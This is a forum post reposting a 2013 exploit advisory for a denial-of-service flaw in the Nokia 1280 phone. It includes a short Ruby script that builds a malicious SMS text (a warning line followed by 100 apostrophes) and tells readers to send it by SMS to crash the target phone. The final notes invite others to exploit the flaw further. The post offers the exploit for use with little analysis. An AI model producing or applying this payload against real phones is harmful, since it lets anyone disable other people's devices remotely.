Jump to content
Kwelwild

Nokia 1280 Dos Vulnerability

Recommended Posts

Posted

http://www.youtube.com/watch?v=csLuNZ0mjpI



 Description: ##################################################  ##############################
#Exploit Title: Nokia 1280 DoS Vulnerability
#Author : Un0wn_X
#E-Mail : unownsec@gmail.com
#Date : Monday, July 01,2013
#Product: http://www.nokia.com/in-en/phones/phone/nokia-1280/
################################################## ##############################
#Vulnerability Advisory
=======================
You can send a SMS containing the malicious buffer and can crash the phone once it loads in the memory.
#Video PoC
============
http://www.youtube.com/watch?v=csLuNZ0mjpI
#Exploit
=========
#!/usr/bin/env ruby
#Author: Un0wn_X
begin
buff = "Don't Scroll Down \n\n"
buff += "'"*100

file = open("exploit.txt","w")
file.write(buff)
file.close()

puts "[+] Exploit created >> exploit.txt"
puts "[*] Now send the text contained inside the exploit.txt by a sms"
puts "[~] Un0wn_X"
end
#Final Notes
=============
I have no idea to attach this to a debugger and fuzz this system. You may exploit further

http://seclists.org/fulldisclosure/2013/Jul/17



Sursa: Nokia 1280 Dos Vulnerability

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...